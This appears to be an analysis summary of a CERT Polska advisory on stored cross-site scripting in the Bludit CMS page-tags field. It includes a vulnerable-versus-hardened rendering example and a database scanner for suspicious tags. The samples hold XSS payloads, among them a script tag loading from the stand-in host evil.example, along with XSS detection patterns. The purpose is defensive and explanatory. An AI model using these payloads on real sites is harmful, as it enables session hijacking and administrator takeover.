Full Report
CERT Polska has received a report about a Stored Cross-site Scripting vulnerability found in Bludit software.
Analysis Summary
# Vulnerability: Stored Cross-Site Scripting in Bludit Page Tagging
## CVE Details
- **CVE ID:** CVE-2026-4420
- **CVSS Score:** Not given on the page. The 7.0 to 8.0 range is the summary author's estimate, reflecting that a payload executing in an administrator's session can be used to escalate privileges; it is not a vendor or CERT Polska score.
- **CWE:** CWE-79 (Improper Neutralization of Input During Web Page Generation)
## Affected Systems
- **Products:** Bludit (CMS software)
- **Versions:** 3.17.2, 3.18.0 (Note: Other versions were not tested and may also be vulnerable)
- **Configurations:** Instances that grant the "Author" or "Editor" role to anyone who is not fully trusted. The attacker needs an account with page-creation rights; an "Administrator" account is not required, and an administrator who views the page is precisely the intended victim.
## Vulnerability Description
Bludit is vulnerable to stored Cross-Site Scripting (XSS) in its page creation functionality. The "tags" field of a page is stored and later rendered without adequate output encoding, so an authenticated attacker with at least page-creation privileges (Author or higher) can save a JavaScript payload in it. The resulting page is reachable by unauthenticated visitors, and the payload executes in the browser of any user who opens its URL. When that user is an administrator, the script runs with the administrator's session and can therefore act on the admin panel on their behalf.
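To make the rendering defect concrete, the following added example (not code from Bludit or from the advisory) contrasts a tag-list template that interpolates stored data raw with one that encodes per output context. The key-to-name shape of the tag map and the payloads are constructed for this example; the point it shows is that the tag key lands in an `href` attribute and the tag name in element text, and each context needs its own encoding.

```python
import html
from urllib.parse import quote

# Constructed sample: the tag map of one page as an attacker holding an
# Author account could submit it through the page editor. The key -> name
# shape is an assumption modelled on Bludit's page records; the payloads are
# made up for this example and are not from the advisory.
MALICIOUS_TAGS = {
    "news": "News",
    "x": "<script>alert(document.cookie)</script>",
    'y" onmouseover="alert(1)': "Hover me",
}


def render_tags_vulnerable(tags):
    """Render a tag list the way a template that trusts stored data does:
    the tag key is dropped straight into an href attribute and the tag
    name straight into element text, with no output encoding."""
    items = []
    for key, name in tags.items():
        items.append('<li><a href="/tag/%s">%s</a></li>' % (key, name))
    return "<ul>" + "".join(items) + "</ul>"


def render_tags_hardened(tags):
    """Same markup with encoding chosen per output context: the key becomes
    a URL path segment (percent-encoded, nothing left unescaped), then the
    resulting URL and the name are HTML-entity encoded with quotes
    included, so neither can close the attribute or open a tag."""
    items = []
    for key, name in tags.items():
        href = "/tag/" + quote(key, safe="")
        items.append('<li><a href="%s">%s</a></li>'
                     % (html.escape(href, quote=True), html.escape(name, quote=True)))
    return "<ul>" + "".join(items) + "</ul>"


if __name__ == "__main__":
    # The first line contains a live <script> element and an injected
    # onmouseover attribute; the second renders both as inert text.
    print(render_tags_vulnerable(MALICIOUS_TAGS))
    print(render_tags_hardened(MALICIOUS_TAGS))
```

Encoding on input (stripping `<` and `>` when the page is saved) is a weaker fix than the one shown here, because the same stored value may later be emitted into an attribute, a URL or a script block where different characters are dangerous; encoding at the output site with the right encoder for that site is what closes the bug.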
## Exploitation
- **Status:** No public proof of concept is referenced on this page; the vulnerability was confirmed on the versions listed above following the report to CERT Polska.
- **Complexity:** Medium (requires a valid account with page-creation rights and a victim who opens the affected page).
- **Attack Vector:** Network (authenticated).
## Impact
- **Confidentiality:** High (session hijacking and theft of any data visible to the victim, including admin-panel data when the victim is an administrator)
- **Integrity:** High (a payload running in an administrator's session can issue admin-panel requests on their behalf, for example creating a new administrator account or modifying content)
- **Availability:** Low (no direct service disruption; the account takeover enabled by the impacts above could in turn be used to take the site down, but that is a second-order effect)
## Remediation
### Patches
- At the time of publication, the vendor has not provided details regarding a specific patch or version fix. Users are advised to monitor the official Bludit repository for updates.
### Workarounds
- **Strict Access Control:** Grant the "Author" and "Editor" roles only to trusted individuals, and remove accounts that no longer need page-creation rights.
- **Manual Review:** Check new and edited pages for tag values that contain markup characters (`<`, `>`, `"`, `'`) or script-like content. This is a detection measure, not a substitute for output encoding in the application.
- **Web Application Firewall (WAF):** Deploy rules that flag or block common XSS patterns in POST requests to the Bludit admin panel. A WAF only raises the bar for an attacker who already holds an account; obfuscated or encoded payloads can bypass pattern matching.
## Detection
- **Indicators of Compromise:** Markup (`<script>` elements, `javascript:` URLs, elements carrying `on*=` event handlers) or obfuscated JavaScript in the `tags` metadata of stored pages, whether inspected in the CMS database or in the rendered articles.
- **Detection Methods:**
- Review web server and admin-panel logs for page creation and edit requests from Author and Editor accounts. Standard access logs do not record POST bodies, so the stored page database is the authoritative place to look for the payload itself.
- Use an automated vulnerability scanner, or a manual test on a non-production copy, to confirm whether markup submitted in the tags field is rendered unescaped on the published page.
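As an added example of the database check described above (not a tool from the advisory or from the Bludit project), the script below parses a page database file and reports tag keys and names that look like markup rather than plain labels. The file layout it expects (a PHP guard line followed by a JSON object keyed by page key, as in Bludit's flat-file `bl-content/databases/pages.php`) is an assumption drawn from the CMS's design rather than something the advisory states; the sample content and its payloads are constructed.

```python
import json
import re

# Constructed sample modelled on Bludit's flat-file page database
# (bl-content/databases/pages.php): a PHP guard line followed by a JSON
# object keyed by page key. The layout is an assumption drawn from the CMS's
# design, not something the advisory describes; the tag values are made up.
SAMPLE_PAGES_PHP = r'''<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
  "welcome": {"title": "Welcome", "username": "admin",
              "tags": {"news": "News", "cms": "CMS"}},
  "hello-world": {"title": "Hello", "username": "author1",
                  "tags": {"x": "<script src=//evil.example/x.js></script>", "ok": "OK"}},
  "notes": {"title": "Notes", "username": "author1",
            "tags": {"y\" onmouseover=\"alert(1)": "Hover",
                     "z": "<img src=x onerror=alert(1)>",
                     "q": "C++ & Rust"}}
}
'''

# Heuristic indicators, from most specific to least. A fuller audit would
# decode HTML entities and URL-encoding before matching; this checks the raw
# stored strings, which is where a payload saved through the editor ends up.
INDICATORS = [
    ("script-tag", re.compile(r"<\s*/?\s*script\b", re.I)),
    ("event-handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript-uri", re.compile(r"javascript\s*:", re.I)),
    ("active-element", re.compile(r"<\s*(iframe|img|svg|object|embed|link|meta|style|math)\b", re.I)),
    ("markup-chars", re.compile(r"[<>\"']")),
]


def load_bludit_db(text):
    """Return the JSON body of a Bludit database file, skipping the PHP guard
    that precedes it when the file is read from disk."""
    stripped = text.lstrip()
    if stripped.startswith("<?php"):
        stripped = stripped.split("?>", 1)[1]
    return json.loads(stripped)


def classify(value):
    """Names of every indicator that fires on one stored string."""
    return [name for name, rx in INDICATORS if rx.search(value)]


def find_suspicious_tags(db):
    """Walk every page's tags (key and display name) and report values that
    look like markup, together with the account that saved the page."""
    findings = []
    for page_key, page in db.items():
        tags = page.get("tags") or {}
        if isinstance(tags, list):          # tolerate a plain list of names
            tags = {t: t for t in tags}
        for tag_key, tag_name in tags.items():
            for field, value in (("key", tag_key), ("name", tag_name)):
                reasons = classify(str(value))
                if reasons:
                    findings.append({
                        "page": page_key,
                        "author": page.get("username"),
                        "field": field,
                        "value": value,
                        "reasons": reasons,
                    })
    return findings


def scan_pages_php(text):
    """Convenience wrapper: parse a pages.php file and return its findings."""
    return find_suspicious_tags(load_bludit_db(text))


if __name__ == "__main__":
    # On the sample this lists three suspect values, all saved by author1;
    # "C++ & Rust" is not reported because '&' and '+' cannot open markup.
    for f in scan_pages_php(SAMPLE_PAGES_PHP):
        print("%(page)s (by %(author)s) tag %(field)s %(value)r: %(reasons)s" % f)
```

Run it against a copy of the live `pages.php` (for example `scan_pages_php(open(path).read())`) rather than editing in place; the `author` field in each finding is what ties a stored payload back to the Author or Editor account that the Workarounds section says to restrict.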
## References
- **Vendor Advisory:** [None provided by vendor]
- **Relevant Links:**
- hxxps[://]cert[.]pl/en/posts/2026/04/CVE-2026-4420/
- hxxps[://]www[.]cve[.]org/CVERecord?id=CVE-2026-4420
- hxxps[://]cwe[.]mitre[.]org/data/definitions/79[.]html